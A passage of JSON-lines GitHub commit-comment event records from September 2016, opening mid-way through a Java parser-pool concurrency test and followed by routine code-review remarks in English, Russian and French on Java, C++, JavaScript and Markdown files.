DispatchCallable(latch));\r\n\r\n      }\r\n\r\n      try {\r\n         for (Future<Boolean> future : service.invokeAll(executors)) {\r\n            if (!future.get()) {\r\n               System.out.println(\"Failed!\");\r\n               Assert.fail();\r\n            }\r\n         }\r\n      } catch (InterruptedException e) {\r\n         // TODO Auto-generated catch block\r\n         e.printStackTrace();\r\n      } catch (ExecutionException e) {\r\n         // TODO Auto-generated catch block\r\n         e.printStackTrace();\r\n      }\r\n\r\n      service.shutdown();\r\n      service.awaitTermination(15, TimeUnit.SECONDS);\r\n\r\n   }\r\n\r\n   private static class DispatchCallable implements Callable<Boolean> {\r\n\r\n      private final CountDownLatch latch;\r\n\r\n      public DispatchCallable(CountDownLatch latch) {\r\n         this.latch = latch;\r\n      }\r\n\r\n      public Boolean call() throws Exception {\r\n         SAXParser saxParser = null;\r\n         latch.countDown();\r\n         latch.await();\r\n         // System.out.println(\"Thead: \" + Thread.currentThread().getName());\r\n         try {\r\n            saxParser = parserPool.get().get();\r\n            Thread.sleep(((long) Math.random() * 500));\r\n         } finally {\r\n            parserPool.get().returnParser(saxParser);\r\n            return true;\r\n         }\r\n      }\r\n\r\n   }\r\n\r\n}\r\n`\r\n\r\n"}},"created_at":"2016-09-27T19:30:04Z"}
{"id":"4626413353","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"0tanya0/SoftwareTestingJava"},"payload":{"comment":{"id":19196730,"position":26,"line":26,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"cfdc1a9921d14c9253379b1258dead87a39fbe54","created_at":"2016-09-27T19:30:05Z","updated_at":"2016-09-27T19:30:05Z","body":"поиск элемента здесь можно сделать 1 раз"}},"created_at":"2016-09-27T19:30:05Z"}
{"id":"4626414345","type":"CommitCommentEvent","actor":{"login":"joebowbeer"},"repo":{"name":"libpd/pd-for-android"},"payload":{"comment":{"id":19196733,"position":null,"line":null,"path":null,"commit_id":"7d41d3cd846ce9ac5e7c9f99993a56773dc805dd","created_at":"2016-09-27T19:30:15Z","updated_at":"2016-09-27T19:30:15Z","body":"*2.14.1* (emphasis on *.1*)"}},"created_at":"2016-09-27T19:30:15Z"}
{"id":"4626416321","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196740,"position":143,"line":143,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.factory.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:30:34Z","updated_at":"2016-09-27T19:30:34Z","body":"Test message."}},"created_at":"2016-09-27T19:30:34Z"}
{"id":"4626416808","type":"CommitCommentEvent","actor":{"login":"mathiasrw"},"repo":{"name":"js-org/dns.js.org"},"payload":{"comment":{"id":19196741,"position":4,"line":366,"path":"cnames_active.js","commit_id":"2ced07c65cc705ab80a64e9f4b3f12ec1e5dbc36","created_at":"2016-09-27T19:30:39Z","updated_at":"2016-09-27T19:30:39Z","body":"How embarrassing - thanks for fixing..."}},"created_at":"2016-09-27T19:30:39Z"}
{"id":"4626418015","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"0tanya0/SoftwareTestingJava"},"payload":{"comment":{"id":19196748,"position":30,"line":30,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"cfdc1a9921d14c9253379b1258dead87a39fbe54","created_at":"2016-09-27T19:30:52Z","updated_at":"2016-09-27T19:30:52Z","body":"wd.findElement(locator) - эта конструкция повторяется во многих местах, моэжно сделать метод findElement(By locator) в этом классе, и везде использовать"}},"created_at":"2016-09-27T19:30:52Z"}
{"id":"4626420557","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196753,"position":129,"line":129,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:31:20Z","updated_at":"2016-09-27T19:31:20Z","body":"Test message."}},"created_at":"2016-09-27T19:31:20Z"}
{"id":"4626420966","type":"CommitCommentEvent","actor":{"login":"IsabelleFollador"},"repo":{"name":"IsabelleFollador/maxi-challenge"},"payload":{"comment":{"id":19196754,"position":null,"line":null,"path":null,"commit_id":"47878c04f0061731ff51236a45de99e4a57cc328","created_at":"2016-09-27T19:31:24Z","updated_at":"2016-09-27T19:31:24Z","body":"de quoi? c'est quoi ça? 😶😃\n\n\n\n2016-09-27 21:10 GMT+02:00 bodohlah <notifications@github.com>:\n\n> pas mal\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/IsabelleFollador/maxi-challenge/commit/47878c04f0061731ff51236a45de99e4a57cc328#commitcomment-19196395>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AVTjkekigtzhTKDhb9w7ZIzqebFqKfgWks5quWougaJpZM4KICzP>\n> .\n>\n"}},"created_at":"2016-09-27T19:31:24Z"}
{"id":"4626421071","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196755,"position":137,"line":137,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:31:25Z","updated_at":"2016-09-27T19:31:25Z","body":"Test message."}},"created_at":"2016-09-27T19:31:25Z"}
{"id":"4626421696","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196756,"position":143,"line":143,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:31:32Z","updated_at":"2016-09-27T19:31:32Z","body":"Test message."}},"created_at":"2016-09-27T19:31:32Z"}
{"id":"4626421739","type":"CommitCommentEvent","actor":{"login":"crism"},"repo":{"name":"pkp/pkp-lib"},"payload":{"comment":{"id":19196757,"position":null,"line":null,"path":null,"commit_id":"9ed15622fce94a95762d89dccbf369ca9d03ccee","created_at":"2016-09-27T19:31:32Z","updated_at":"2016-09-27T19:31:32Z","body":"That works. Thanks, @NateWr, and sorry for missing that."}},"created_at":"2016-09-27T19:31:32Z"}
{"id":"4626421966","type":"CommitCommentEvent","actor":{"login":"emaish"},"repo":{"name":"aspnetboilerplate/aspnetboilerplate"},"payload":{"comment":{"id":19196758,"position":null,"line":null,"path":null,"commit_id":"681f25249e64c57605016af96c2930b1763236ac","created_at":"2016-09-27T19:31:34Z","updated_at":"2016-09-27T19:31:34Z","body":"God bless you :)"}},"created_at":"2016-09-27T19:31:34Z"}
{"id":"4626422286","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196761,"position":149,"line":149,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:31:38Z","updated_at":"2016-09-27T19:31:38Z","body":"Test message."}},"created_at":"2016-09-27T19:31:38Z"}
{"id":"4626422818","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"FoX31/java_pft"},"payload":{"comment":{"id":19196763,"position":22,"line":22,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"1d6ce117dd14d745b2f77c60b16031f50ae153bb","created_at":"2016-09-27T19:31:44Z","updated_at":"2016-09-27T19:31:44Z","body":"клик не нужен здесь"}},"created_at":"2016-09-27T19:31:44Z"}
{"id":"4626423629","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"FoX31/java_pft"},"payload":{"comment":{"id":19196764,"position":24,"line":24,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"1d6ce117dd14d745b2f77c60b16031f50ae153bb","created_at":"2016-09-27T19:31:53Z","updated_at":"2016-09-27T19:31:53Z","body":"поиск можно сделать 1 раз"}},"created_at":"2016-09-27T19:31:53Z"}
{"id":"4626424338","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196766,"position":71,"line":71,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.validate.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:32:01Z","updated_at":"2016-09-27T19:32:01Z","body":"Add test case to test that destination props are set."}},"created_at":"2016-09-27T19:32:01Z"}
{"id":"4626425337","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196767,"position":77,"line":77,"path":"lib/node_modules/@stdlib/utils/deep-get/test/test.validate.js","commit_id":"93fe5716fcefe74827893e5733a02d22cda2e95d","created_at":"2016-09-27T19:32:11Z","updated_at":"2016-09-27T19:32:11Z","body":"Add test case that no destination props are set."}},"created_at":"2016-09-27T19:32:11Z"}
{"id":"4626425941","type":"CommitCommentEvent","actor":{"login":"Bodeguero"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19196768,"position":null,"line":null,"path":null,"commit_id":"06bc5cc2b2e5ee72750b569e48f22425655ba60f","created_at":"2016-09-27T19:32:16Z","updated_at":"2016-09-27T19:32:16Z","body":"@cybrann You are in Contributors Team, please accepted the invitation!"}},"created_at":"2016-09-27T19:32:16Z"}
{"id":"4626426096","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196769,"position":85,"line":74,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:32:18Z","updated_at":"2016-09-27T19:32:18Z","body":"интерфейс у ```set_input``` и ```set_mask``` (хотя я и не понимаю, что делает ```set_mask```) разный. в одном случае, если размер не совпадает, то генерируется исключение, в другом случае, если размер не совпадает, исключение не генерируется. надо привести к одному виду"}},"created_at":"2016-09-27T19:32:18Z"}
{"id":"4626427887","type":"CommitCommentEvent","actor":{"login":"ilyubin"},"repo":{"name":"FoX31/java_pft"},"payload":{"comment":{"id":19196772,"position":35,"line":35,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/appmanager/HelperBase.java","commit_id":"1d6ce117dd14d745b2f77c60b16031f50ae153bb","created_at":"2016-09-27T19:32:37Z","updated_at":"2016-09-27T19:32:37Z","body":"Добавить метод select(By locator, string text) - для работы с комбобоксами, чтобы выбирать даты у контактов"}},"created_at":"2016-09-27T19:32:37Z"}
{"id":"4626432020","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196780,"position":158,"line":141,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:33:24Z","updated_at":"2016-09-27T19:33:24Z","body":"если вся команда умещается в ```for``` и тело цикла не надо, то поставьте просто точку с запятой\r\n```cpp\r\nfor (auto i = n; it != m_output.end() && i > 0; ++it, ++i);\r\n```"}},"created_at":"2016-09-27T19:33:24Z"}
{"id":"4626434050","type":"CommitCommentEvent","actor":{"login":"nicoguaro"},"repo":{"name":"enthought/mayavi"},"payload":{"comment":{"id":19196786,"position":null,"line":null,"path":null,"commit_id":"6ad973081596e5bfc57cfc6d3850a042c0cb2481","created_at":"2016-09-27T19:33:47Z","updated_at":"2016-09-27T19:33:47Z","body":"Can you add that the Jupyter inclusion started with version 4.5? Also, can you specify what version of Jupyter did you use? I tried installing it but got an error\r\n\r\n    [InstallNBExtensionApp] CRITICAL | Bad config encountered during initialization:\r\n    [InstallNBExtensionApp] CRITICAL | Unrecognized flag: '--py'\r\n"}},"created_at":"2016-09-27T19:33:47Z"}
{"id":"4626435153","type":"CommitCommentEvent","actor":{"login":"hsutter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19196787,"position":50,"line":98,"path":"bitflags.h","commit_id":"a1902796acb51adf3ef7f91e9d7873c3562cbd65","created_at":"2016-09-27T19:34:01Z","updated_at":"2016-09-27T19:34:01Z","body":"Thanks. I've applied that, and simplified it a bit to give a nicer name and avoid the double negative. I think the current version reads pretty cleanly:\r\n\r\n~~~\r\n\t\t\tauto all_false = [](unit u) { return u == unit(0); };\r\n\t\t\treturn std::all_of(bits.get(), bits.get() + unit_count(size) - 1, all_false)\r\n\t\t\t\t&& all_false(*(bits.get() + unit_count(size) - 1) & (bit_mask(size) - 1));\r\n~~~"}},"created_at":"2016-09-27T19:34:01Z"}
{"id":"4626438797","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196804,"position":37,"line":37,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:34:45Z","updated_at":"2016-09-27T19:34:45Z","body":"Spacing."}},"created_at":"2016-09-27T19:34:45Z"}
{"id":"4626439325","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196805,"position":25,"line":25,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:34:50Z","updated_at":"2016-09-27T19:34:50Z","body":"Spacing."}},"created_at":"2016-09-27T19:34:50Z"}
{"id":"4626440224","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196806,"position":46,"line":46,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:35:00Z","updated_at":"2016-09-27T19:35:00Z","body":"Add newline before list."}},"created_at":"2016-09-27T19:35:00Z"}
{"id":"4626440572","type":"CommitCommentEvent","actor":{"login":"hsutter"},"repo":{"name":"hsutter/gcpp"},"payload":{"comment":{"id":19196807,"position":50,"line":98,"path":"bitflags.h","commit_id":"a1902796acb51adf3ef7f91e9d7873c3562cbd65","created_at":"2016-09-27T19:35:04Z","updated_at":"2016-09-27T19:35:04Z","body":"Though I only just noticed that I ended up giving the lambda the same name as the function. Meh, it works fine."}},"created_at":"2016-09-27T19:35:04Z"}
{"id":"4626441626","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196809,"position":45,"line":45,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:35:15Z","updated_at":"2016-09-27T19:35:15Z","body":"Remove backticks around \"function\"."}},"created_at":"2016-09-27T19:35:15Z"}
{"id":"4626443052","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196811,"position":49,"line":49,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:35:30Z","updated_at":"2016-09-27T19:35:30Z","body":"Remove backticks from \"function\"."}},"created_at":"2016-09-27T19:35:30Z"}
{"id":"4626444249","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196813,"position":53,"line":53,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:35:43Z","updated_at":"2016-09-27T19:35:43Z","body":"Spacing."}},"created_at":"2016-09-27T19:35:43Z"}
{"id":"4626445304","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196815,"position":68,"line":68,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:35:54Z","updated_at":"2016-09-27T19:35:54Z","body":"Spacing."}},"created_at":"2016-09-27T19:35:54Z"}
{"id":"4626446024","type":"CommitCommentEvent","actor":{"login":"Ledragon"},"repo":{"name":"tomwanzek/d3-v4-definitelytyped"},"payload":{"comment":{"id":19196817,"position":null,"line":null,"path":null,"commit_id":"adb386355aa17eafc4d9fb9ac37616bda187ead2","created_at":"2016-09-27T19:36:02Z","updated_at":"2016-09-27T19:36:02Z","body":"Now I feel sad, it's the end of it 😭 "}},"created_at":"2016-09-27T19:36:02Z"}
{"id":"4626446294","type":"CommitCommentEvent","actor":{"login":"neonichu"},"repo":{"name":"KrauseFx/fastlane-plugin-no_u"},"payload":{"comment":{"id":19196819,"position":null,"line":null,"path":null,"commit_id":"afc8dc2055f6cd36fd2c9cf685d970122f1a735b","created_at":"2016-09-27T19:36:04Z","updated_at":"2016-09-27T19:36:04Z","body":"true, you should add it"}},"created_at":"2016-09-27T19:36:04Z"}
{"id":"4626446614","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196820,"position":81,"line":81,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:36:08Z","updated_at":"2016-09-27T19:36:08Z","body":"Remove backticks from \"function\"."}},"created_at":"2016-09-27T19:36:08Z"}
{"id":"4626451468","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196830,"position":163,"line":163,"path":"lib/node_modules/@stdlib/utils/deep-pluck/README.md","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:37:05Z","updated_at":"2016-09-27T19:37:05Z","body":"This is not valid Markdown comment syntax. Once converted to an HTML comment, needs to be followed by a newline."}},"created_at":"2016-09-27T19:37:05Z"}
{"id":"4626455696","type":"CommitCommentEvent","actor":{"login":"indus"},"repo":{"name":"js-org/dns.js.org"},"payload":{"comment":{"id":19196841,"position":4,"line":366,"path":"cnames_active.js","commit_id":"2ced07c65cc705ab80a64e9f4b3f12ec1e5dbc36","created_at":"2016-09-27T19:37:51Z","updated_at":"2016-09-27T19:37:51Z","body":"no problem ;-)"}},"created_at":"2016-09-27T19:37:51Z"}
{"id":"4626456764","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196842,"position":25,"line":25,"path":"lib/node_modules/@stdlib/utils/deep-pluck/lib/validate.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:38:02Z","updated_at":"2016-09-27T19:38:02Z","body":"Use `hasOwnProperty` utility."}},"created_at":"2016-09-27T19:38:02Z"}
{"id":"4626459272","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196848,"position":28,"line":28,"path":"lib/node_modules/@stdlib/utils/deep-pluck/lib/validate.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:38:29Z","updated_at":"2016-09-27T19:38:29Z","body":"'invalid option. `copy` option must be a boolean primitive. ...'"}},"created_at":"2016-09-27T19:38:29Z"}
{"id":"4626462955","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196855,"position":28,"line":28,"path":"lib/node_modules/@stdlib/utils/deep-pluck/lib/validate.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:39:10Z","updated_at":"2016-09-27T19:39:10Z","body":"Current practice is to surround the actual option name with backticks, rather than use a reference to the option."}},"created_at":"2016-09-27T19:39:10Z"}
{"id":"4626464027","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196858,"position":12,"line":12,"path":"lib/node_modules/@stdlib/utils/deep-pluck/package.json","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:39:22Z","updated_at":"2016-09-27T19:39:22Z","body":"Why `stdmath`?"}},"created_at":"2016-09-27T19:39:22Z"}
{"id":"4626464260","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196859,"position":163,"line":146,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:39:25Z","updated_at":"2016-09-27T19:39:25Z","body":"не надо возвращать ссылки!\r\n\r\n```cpp\r\nstruct A\r\n{\r\n\tstd::string s;\r\n\tconst std::string & getS()\r\n\t{\r\n\t\treturn s;\r\n\t}\r\n};\r\n\r\nint main()\r\n{\r\n\tA * a11 = new A;\r\n\ta11->s = \"asdfadfasf\";\r\n\tconst std::string & s = a11->getS();\r\n\tdelete a11;\r\n\tstd::cout << s; // что же произойдет?\r\n}\r\n\r\n```"}},"created_at":"2016-09-27T19:39:25Z"}
{"id":"4626464292","type":"CommitCommentEvent","actor":{"login":"yoshuawuyts"},"repo":{"name":"maxogden/yo-yo"},"payload":{"comment":{"id":19196860,"position":null,"line":null,"path":null,"commit_id":"35c62a086ee801171c4a06aab2d109f2cf7257d6","created_at":"2016-09-27T19:39:26Z","updated_at":"2016-09-27T19:39:26Z","body":":tada: thanks!"}},"created_at":"2016-09-27T19:39:26Z"}
{"id":"4626466275","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196865,"position":183,"line":164,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:39:48Z","updated_at":"2016-09-27T19:39:48Z","body":"```std::move``` не нужен"}},"created_at":"2016-09-27T19:39:48Z"}
{"id":"4626466342","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19196866,"position":null,"line":null,"path":null,"commit_id":"7c4e7cb6c1f4fe075d37b318bcf582d17811da84","created_at":"2016-09-27T19:39:49Z","updated_at":"2016-09-27T19:39:49Z","body":"ENERGYPLUS_EXPECTED_HASH (macumber) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7c4e7cb6c1f4fe075d37b318bcf582d17811da84-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-27T19:39:49Z"}
{"id":"4626466844","type":"CommitCommentEvent","actor":{"login":"yyx990803"},"repo":{"name":"vuejs/vue"},"payload":{"comment":{"id":19196867,"position":null,"line":null,"path":null,"commit_id":"3b49a6316ecfa4ed29a038b0385207ff9c8b60c8","created_at":"2016-09-27T19:39:54Z","updated_at":"2016-09-27T19:39:54Z","body":"@broox a fix is already implemented, publishing soon."}},"created_at":"2016-09-27T19:39:54Z"}
{"id":"4626467930","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196871,"position":6,"line":6,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:40:07Z","updated_at":"2016-09-27T19:40:07Z","body":"Fix the `require` statement. This should have been caught by running tests prior to committing. "}},"created_at":"2016-09-27T19:40:07Z"}
{"id":"4626469026","type":"CommitCommentEvent","actor":{"login":"Dancanplay"},"repo":{"name":"stormbreakerbg/Dark-youtube-plugin-chrome"},"payload":{"comment":{"id":19196872,"position":null,"line":null,"path":null,"commit_id":"b4fef246bc49f7e223a88c89a6bf8d43e94ee063","created_at":"2016-09-27T19:40:18Z","updated_at":"2016-09-27T19:40:18Z","body":"Changelog: \r\n-Styles for slider buttons\r\n-Creator studio fixes (Video manager)\r\nThanks to: Noyloy, vuongggggg"}},"created_at":"2016-09-27T19:40:18Z"}
{"id":"4626470084","type":"CommitCommentEvent","actor":{"login":"garethbowen"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19196875,"position":10,"line":32,"path":"static/css/material.less","commit_id":"08b9897f14ef1dec502779f196416f657d4c6772","created_at":"2016-09-27T19:40:30Z","updated_at":"2016-09-27T19:40:30Z","body":"Most of this is the same as the `h4` above. Use `h3,\\nh4 {` to reduce duplication."}},"created_at":"2016-09-27T19:40:30Z"}
{"id":"4626471249","type":"CommitCommentEvent","actor":{"login":"sergio-teruel"},"repo":{"name":"OCA/connector-prestashop"},"payload":{"comment":{"id":19196879,"position":9,"line":51,"path":"connector_prestashop/models/stock.py","commit_id":"02f7fee56bda9254354f6498384137f3e2340193","created_at":"2016-09-27T19:40:44Z","updated_at":"2016-09-27T19:40:44Z","body":"Changes done"}},"created_at":"2016-09-27T19:40:44Z"}
{"id":"4626471470","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196880,"position":2,"line":5,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:40:46Z","updated_at":"2016-09-27T19:40:46Z","body":"это зачем? мне кажется вполне достаточно ```m_objCount```"}},"created_at":"2016-09-27T19:40:46Z"}
{"id":"4626477466","type":"CommitCommentEvent","actor":{"login":"stratakis"},"repo":{"name":"fedora-python/python26"},"payload":{"comment":{"id":19196892,"position":null,"line":null,"path":null,"commit_id":"45da95ba24d90dd16606cfea1f7c7879746fd734","created_at":"2016-09-27T19:41:54Z","updated_at":"2016-09-27T19:41:54Z","body":"by the way this was fixed fairly recently upstream:\r\nhttp://bugs.python.org/issue26661"}},"created_at":"2016-09-27T19:41:54Z"}
{"id":"4626478604","type":"CommitCommentEvent","actor":{"login":"Aarone2004"},"repo":{"name":"bubbie/bluks-adventure-into-space"},"payload":{"comment":{"id":19196896,"position":98,"line":98,"path":"entities.lua","commit_id":"6c8b0e8f6fb946876fcde4d12157c44edb31cf3e","created_at":"2016-09-27T19:42:07Z","updated_at":"2016-09-27T19:42:07Z","body":"hot"}},"created_at":"2016-09-27T19:42:07Z"}
{"id":"4626479658","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196898,"position":65,"line":65,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:42:19Z","updated_at":"2016-09-27T19:42:19Z","body":"s/deepPlucks/deep plucks/"}},"created_at":"2016-09-27T19:42:19Z"}
{"id":"4626482498","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19196905,"position":1,"line":4,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-27T19:42:52Z","updated_at":"2016-09-27T19:42:52Z","body":"используйте или ```under_score``` или ```caseCamel```"}},"created_at":"2016-09-27T19:42:52Z"}
{"id":"4626482636","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196906,"position":118,"line":118,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:42:54Z","updated_at":"2016-09-27T19:42:54Z","body":"s/deepPlucked/deep plucked/"}},"created_at":"2016-09-27T19:42:54Z"}
{"id":"4626484147","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196912,"position":134,"line":134,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:43:11Z","updated_at":"2016-09-27T19:43:11Z","body":"s/deepPlucked/deep plucked/"}},"created_at":"2016-09-27T19:43:11Z"}
{"id":"4626485228","type":"CommitCommentEvent","actor":{"login":"kgryte"},"repo":{"name":"stdlib-js/stdlib"},"payload":{"comment":{"id":19196916,"position":138,"line":138,"path":"lib/node_modules/@stdlib/utils/deep-pluck/test/test.js","commit_id":"cb59de7f549f03576c3b579f34480a1036ced0d9","created_at":"2016-09-27T19:43:24Z","updated_at":"2016-09-27T19:43:24Z","body":"s/deepPlucked/deep plucked/"}},"created_at":"2016-09-27T19:43:24Z"}
